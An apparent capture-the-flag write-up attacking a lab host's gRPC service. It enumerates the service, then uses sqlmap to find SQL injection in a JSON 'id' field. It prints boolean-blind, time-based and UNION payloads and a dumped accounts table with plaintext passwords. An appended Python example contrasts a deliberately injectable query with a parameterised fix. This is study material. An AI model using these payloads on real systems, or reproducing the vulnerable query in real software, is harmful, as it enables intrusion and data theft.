Nmap scan report for 10.10.11.214
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
~~~~~
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 110.41 ms 10.10.14.1
2 110.43 ms 10.10.11.214
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.67 seconds
Judging from the scan, apart from SSH on port 22 the only other open port is 50051, which is most likely a gRPC service.
Connecting with grpcurl:
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $grpcurl 10.10.11.214:50051 list
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $grpcurl -plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
┌─[randark@randark-Parrot]─[~]
└──╼ $grpcurl -plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
Next, connecting with grpcui:
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
┌─[randark@randark-Parrot]─[~]
└──╼ $grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:43237/
By interacting with the three exposed methods, we can obtain:
Next, test whether an admin account exists:
After obtaining admin-level access, the plain gRPC service offered nothing further worth digging into, so I tried to find whether an injection point existed.
POST /invoke/SimpleApp.getInfo HTTP/1.1
Host: 127.0.0.1:37855
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:37855/
Content-Type: application/json
x-grpcui-csrf-token: JoOCYuunUHhbCo-GeeuQKXx3BkC9htbeyIbIT69Rgvs
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://127.0.0.1:37855
DNT: 1
Connection: close
Cookie: _grpcui_csrf_token=JoOCYuunUHhbCo-GeeuQKXx3BkC9htbeyIbIT69Rgvs
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143"}]}
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $sqlmap -r sqlmap.txt
~~~
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 193 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143 AND 6594=6594"}]}
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143 AND 2170=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"-8393 UNION ALL SELECT CHAR(113,106,120,118,113)||CHAR(103,120,113,102,67,112,69,79,75,84,80,83,118,119,108,88,108,85,111,69,65,98,87,78,113,76,80,71,83,109,97,113,107,98,101,109,101,102,98,97)||CHAR(113,113,113,98,113)-- Fjog"}]}
---
[10:44:28] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[10:44:28] [INFO] fetched data logged to text files under '/home/randark/.local/share/sqlmap/output/127.0.0.1'
[10:44:28] [WARNING] your sqlmap version is outdated
So, start dumping the database:
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $sqlmap -r sqlmap.txt --batch --dump
[10:45:38] [INFO] fetching tables for database: 'SQLite_masterdb'
[10:45:38] [INFO] fetching columns for table 'messages'
[10:45:39] [INFO] fetching entries for table 'messages'
Database: <current>
Table: messages
[1 entry]
+-----+-------------------+----------+
| id | message | username |
+-----+-------------------+----------+
| 143 | Will update soon. | admin |
+-----+-------------------+----------+
[10:45:39] [INFO] fetching columns for table 'accounts'
[10:45:39] [INFO] fetching entries for table 'accounts'
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
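Added example (not code from the write-up or from the target): a hypothetical Python/SQLite reconstruction of the flaw sqlmap reported in `SimpleApp.getInfo`, showing the string-built query that lets `143 AND 6594=6594` act as a boolean oracle next to a validated, parameterised version. The table layout and rows mirror what sqlmap dumped above; the function names are assumptions.

```python
import sqlite3


def build_db():
    """Constructed in-memory copy of the two tables sqlmap dumped."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE messages (id INTEGER, message TEXT, username TEXT);
        CREATE TABLE accounts (password TEXT, username TEXT);
        INSERT INTO messages VALUES (143, 'Will update soon.', 'admin');
        INSERT INTO accounts VALUES ('admin', 'admin');
        INSERT INTO accounts VALUES ('HereIsYourPassWord1431', 'sau');
    """)
    return conn


def get_info_vulnerable(conn, id_value):
    # Hypothetical reconstruction of the bug: the JSON "id" string is pasted
    # into the SQL text, so anything after the number is executed as SQL.
    # "143 AND 6594=6594" returns the row, "143 AND 6594=6595" returns nothing,
    # which is exactly the true/false difference a boolean-blind test needs.
    query = f"SELECT message FROM messages WHERE id = {id_value}"
    return [row[0] for row in conn.execute(query)]


def get_info_fixed(conn, id_value):
    # Hardened form: insist on an integer-looking value, then bind it as a
    # parameter so SQLite treats it as data and never as SQL syntax.
    if not isinstance(id_value, str) or not id_value.isdigit():
        raise ValueError("id must be a non-negative integer string")
    query = "SELECT message FROM messages WHERE id = ?"
    return [row[0] for row in conn.execute(query, (int(id_value),))]


def fixed_rejects(conn, id_value):
    """True when the hardened handler refuses the supplied id value."""
    try:
        get_info_fixed(conn, id_value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print(get_info_vulnerable(db, "143 AND 6594=6594"))  # oracle says "true"
    print(get_info_vulnerable(db, "143 AND 6594=6595"))  # oracle says "false"
    print(fixed_rejects(db, "143 AND 6594=6594"))        # True: rejected
```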